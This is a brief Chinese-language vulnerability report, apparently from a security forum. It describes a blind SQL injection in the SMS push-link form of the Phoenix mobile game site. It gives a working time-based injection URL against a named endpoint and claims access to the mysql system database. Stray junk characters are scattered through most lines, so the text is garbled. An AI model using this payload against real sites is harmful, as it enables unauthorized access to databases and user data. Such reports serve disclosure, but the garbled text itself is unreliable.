简要描述:
- P( d" ?2 i$ V5 k0 i凤凰手机游戏网,在填写手机号码发送push连接的地方存在sql盲注漏洞。
5 Y3 {% _ B7 u# e8 Z( d. \+ `. N+ h% D3 k0 v0 s6 i
详细说明:
7 y; O5 W3 _' A存在SQL盲注url:# `: f5 C3 G" |. I! Q h* u( R
fenghuang/game/game_send_sms.jsp?gameid=130221346000%27%20and%20sleep%282%29%3d%27&mo=1& _$ H% C' j' O4 k' a+ U' [! r6 b0 b
http://www.myhack58.com/Article/UploadPic/2013-4/2013411254849748.png
$ d- e7 D- Y2 O. u5 j6 e2 R% m7 Dhttp://www.myhack58.com/Article/UploadPic/2013-4/20134112545369314.png1 ?0 A( u; a* U6 k1 s2 x7 s
http://www.myhack58.com/Article/UploadPic/2013-4/20134112565766695.jpg
7 ]$ f ]# e. x. o2 ]: F
# L! p& W& {6 T能看到mysql系统数据库,看来user权限应该很高的。。 |